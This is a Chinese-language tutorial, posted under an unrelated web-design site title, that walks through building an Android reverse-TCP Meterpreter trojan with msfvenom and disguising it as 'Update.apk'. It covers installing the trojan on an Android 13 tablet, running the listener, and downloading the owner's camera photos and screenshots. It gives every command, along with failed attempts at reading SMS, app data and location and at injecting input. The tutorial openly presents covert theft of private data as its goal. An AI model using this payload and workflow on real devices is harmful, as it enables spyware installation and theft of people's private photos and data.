阳泉市网站建设_网站建设公司_安全防护_seo优化

核心目标：通过Metasploit生成恶意APK，植入平板获取Meterpreter会话，实现敏感数据窃取（照片/截图为主），熟悉Android 10+权限壁垒与渗透边界。

测试环境：Kali Linux（攻击机）、Android 13平板（目标机，联发科芯片）、USB数据线、同一Wi-Fi网段（10.205.x.x）。

核心工具：Metasploit Framework（msfvenom生成木马、msfconsole监听）、ADB（设备连接辅助）。

第一阶段：前期准备（环境校验+木马生成）

1.1 攻击机网络环境配置（关键前提）

目标：确保Kali与平板处于同一Wi-Fi网段（10.205.x.x），避免跨网段通信失败。

1. 查看Kali网卡IP（重点看wlan0，连接平板所在Wi-Fi）：ip a

   1. 成功标识：wlan0网卡显示inet 10.205.xxx.xxx/19（如本次的10.205.105.150），与平板IP（10.205.118.136）同网段。

   2. 失败处理：若为192.168.x.x，重新连接平板Wi-Fi（如Tenda_3EFBDO），直至获取10.205网段IP。

2. ADB服务重启（清除旧连接残留）：adb kill-server && adb start-server

   1. 成功标识：提示* daemon started successfully；失败则检查USB连接或平板开发者模式。

1.2 生成适配的恶意APK（木马上线核心）

利用msfvenom生成Android反向TCP木马，指定攻击机IP和监听端口，确保平板运行后能主动连回Kali。

1. 生成命令（替换LHOST为Kali的10.205网段IP）：msfvenom -p android/meterpreter/reverse_tcp LHOST=10.205.105.150 LPORT=4444 -o /tmp/Update.apk

2. 参数说明：

   1. -p：指定 payload（android/meterpreter/reverse_tcp 为安卓反向控制模块）；

   2. LHOST：攻击机（Kali）IP，必须与平板同网段；

   3. LPORT：监听端口（自定义，如4444，需与后续监听端口一致）；

   4. -o：指定输出路径与文件名（伪装为Update.apk，降低警惕）。

3. 生成验证：

   1. 成功标识：提示Payload size: 101183 bytes，在/tmp目录下可见Update.apk；

   2. 失败处理：若提示“command not found”，安装Metasploit：apt install metasploit-framework。

第二阶段：木马植入与会话建立（核心实战环节）

2.1 USB传输木马至平板（物理植入，绕开无线障碍）

因无线ADB存在协议报错（Protocol fault），选择USB物理传输，稳定性更高。

1. 平板连接Kali：用USB线连接平板与Kali，平板解锁屏幕，下拉通知栏选择“传输文件（MTP）”模式（必须选此模式，否则无法传输文件）。

2. 传输木马：

   1. Kali打开文件管理器，进入/tmp目录，找到Update.apk；

   2. 找到平板设备的“Download（下载）”文件夹，将Update.apk拖入（拖完可直接拔线，短文件无损坏风险）。

2.2 平板端手动安装与触发（木马上线关键）

Android 13禁止静默安装，需手动操作，且必须触发运行（否则木马后台被杀死）。

1. 平板打开“文件管理器”→“下载”目录，找到Update.apk；

2. 点击安装：弹出“未知来源应用”警告时，选择“允许”（平板默认禁止安装第三方APP，需手动授权）；

3. 触发运行：安装完成后，必须点击“打开”按钮（不要点“完成”）；若误点完成，需在平板“应用列表”找到“Update”图标，手动点击运行。

   1. 关键原理：Android 13会杀死无界面的后台静默进程，手动打开能让木马进入运行状态，主动连回Kali。

2.3 Kali端启动监听（获取Meterpreter会话）

通过msfconsole配置监听模块，等待平板木马反向连接。

1. 打开msfconsole：msfconsole（加-q参数可静默启动，减少冗余输出）

2. 加载监听模块：use exploit/multi/handler

3. 配置监听参数（必须与木马生成参数一致）：set PAYLOAD android/meterpreter/reverse_tcp（与木马payload一致）set LHOST 10.205.105.150（Kali的10.205网段IP）set LPORT 4444（与木马端口一致）set ExitOnSession false（防止会话断开后监听终止）

4. 启动监听：run -j（-j参数表示后台运行，不占用终端）

5. 会话建立验证：

   1. 成功标识：Kali终端提示[*] Meterpreter session 1 opened (10.205.105.150:4444 -> 10.205.118.136:xxxx)，进入meterpreter命令行；

   2. 失败处理：若1分钟内无反应，检查平板是否打开Update.apk、Kali与平板是否同网段、端口是否被占用（用netstat -tulnp | grep 4444排查）。

第三阶段：后渗透测试（数据窃取+权限测试）

3.1 系统信息探查（确认控制范围）

在meterpreter会话中执行命令，获取平板基础信息，判断渗透边界。

1. 查看系统信息：sysinfo

   1. 输出内容：平板系统版本（Android 13）、架构（arm64）、设备名称等，确认控制的是目标真机。

2. 查看安装应用（需加载appapi扩展）：load appapi（加载扩展，成功提示[+] Loaded extension appapi）app_list（列出所有APP，包括系统应用和第三方应用，如QQ、WPS等）

   1. 备用方案：若加载失败，用安卓原生命令（进入shell后执行）：pm list packages（仅显示包名，如com.tencent.mobileqq）。

3.2 敏感数据窃取（核心成果，100%生效）

重点窃取平板外部存储（/sdcard）数据，此目录为普通APP可访问范围，无权限拦截。

3.2.1 下载相机照片与截图

1. 下载相机目录（DCIM）：download /sdcard/DCIM/ /root/Desktop/平板照片/

   1. 说明：DCIM是安卓默认相机存储目录，包含拍摄的照片、视频临时文件；

   2. 成功标识：meterpreter提示“mirrored”“Completed”，在Kali桌面“平板照片”文件夹可见对应文件。

2. 下载截图目录（Pictures/Screenshots）：download /sdcard/Pictures/Screenshots/ /root/Desktop/平板截图/

   1. 本次成果：成功下载7张截图（20251213-20251215期间），含平板用户日常操作痕迹，价值极高。

3.2.2 尝试获取高敏感数据（权限受限，了解边界）

以下操作因Android权限壁垒失败，需明确渗透边界，避免无效尝试：

1. 窃取QQ/浏览器数据：download /sdcard/Android/data/com.tencent.mobileqq/ /root/Desktop/QQ数据/download /data/data/com.feimi.browser/app_webview/ /root/Desktop/浏览器记录/

   1. 报错：stdapi_fs_ls: Operation failed: 1；

   2. 原因：/sdcard/Android/data为应用私有存储（Android 11+加密），/data/data为内部存储，普通进程无访问权限。

2. 读取短信/通讯录：shell（进入安卓原生shell）content query --uri content://sms/inbox --projection address:body:date

   1. 报错：Permission Denial: requires android.permission.ACCESS_CONTENT_PROVIDERS_EXTERNALLY；

   2. 原因：需READ_SMS/READ_CONTACTS危险权限，且Android 13+需用户手动弹窗授权，后台进程无法触发。

3. 读取地理位置：dumpsys location | grep "lastLocation"

   1. 结果：无输出；

   2. 原因：位置信息为高敏感数据，仅系统/ROOT进程可访问。

3.3 尝试控制APP/模拟输入（权限壁垒测试）

尝试通过命令控制平板界面，均因Android 10+权限限制失败，明确控制边界：

1. 直接执行am/input命令（meterpreter中）：am start -n com.mediatek.engineermode/.EngineerModeinput keyevent 224（唤醒屏幕）input tap 500 500（模拟点击）

   1. 报错：Unknown command: am/input；

   2. 原因：am/input是安卓原生命令，需进入安卓shell执行，meterpreter不直接支持。

2. 进入安卓shell后执行：shell（进入安卓shell，提示符变为u0_aXXX@localhost:/ $）am start -n com.mediatek.engineermode/.EngineerMode

   1. 报错：java.lang.SecurityException: Permission Denial: package=com.android.shell does not belong to uid=10168；

   2. 原因：meterpreter为普通APP进程，无权限启动其他APP（安卓包名与UID校验）。

3. 执行input命令：input keyevent 224input tap 500 500

   1. 报错：java.lang.SecurityException: Injecting to another application requires INJECT_EVENTS permission；

   2. 原因：INJECT_EVENTS权限仅开放给系统签名APP/开启无障碍服务的APP，普通进程无法获取，是Android 10+的核心控制壁垒。

4. 屏幕录制测试：screenrecord /sdcard/screen.mp4

   1. 结果：无报错但无文件生成；

   2. 原因：需前台服务+录屏权限，后台运行的meterpreter无法触发权限弹窗，被系统静默拒绝。

第四阶段：下载文件查看与权限修复

4.1 查看下载的图片（解决“ls可见但图形界面不可见”问题）

1. 进入下载目录：cd /root/Desktop/平板截图

2. 查看文件列表（确认文件存在）：ls

   1. 输出示例：Screenshot_20251213-142722.png 等7个文件。

3. 修复文件权限（核心解决图形界面不可见问题）：chmod -R 777 /root/Desktop/*

   1. 原理：meterpreter下载的文件默认权限为rw-------（仅root可读写），给所有文件开放可读可写权限，图形界面即可访问。

4. 命令行打开图片（绕开图形界面编码问题）：eog *.png（一次性打开所有png图片）

   1. 备用命令：若eog打不开，用feh查看器：feh Screenshot_20251213-142722.png；

   2. 效果：弹出图片查看器窗口，可通过鼠标/键盘翻页查看所有截图。

5. 中文目录转英文（彻底解决编码异常）：cd /root/Desktopmv 平板截图 tablet_screenshotsmv 平板照片 tablet_photos

   1. 原理：部分Kali图形界面对中文目录识别异常，改英文名后可正常访问。

第五阶段：常见报错与解决方案（重点复习）

第六阶段：实战总结与渗透边界

6.1 本次渗透成果（核心价值）

1. 成功获取平板Meterpreter会话，突破Android 13基础沙箱；

2. 窃取7张平板截图及相机目录数据，获取用户隐私信息；

3. 摸清Android 10+权限体系，明确“可做”与“不可做”的边界。

6.2 渗透边界（关键认知，避免无效尝试）

1. 无Root/用户授权时，仅能访问平板外部存储（/sdcard）数据，无法获取应用私有数据、短信、通讯录、位置等敏感信息；

2. 无法远程模拟触摸/按键/启动APP（INJECT_EVENTS权限壁垒），仅能通过用户手动授权（无障碍服务）或Root突破；

3. 后渗透核心价值在于“隐蔽窃取数据”，而非“炫技式控制界面”，前者更符合实战场景。

6.3 重复练习建议

1. 按流程重复3-5次，重点练习“木马生成-USB传输-监听上线-数据窃取”全环节，确保每个命令都能熟练输入；

2. 更换不同Android版本平板（如Android 11、14）测试，对比权限壁垒差异；

3. 尝试Root平板后，重复后渗透操作，验证Root权限对突破权限壁垒的作用（如读取应用私有数据、模拟输入）。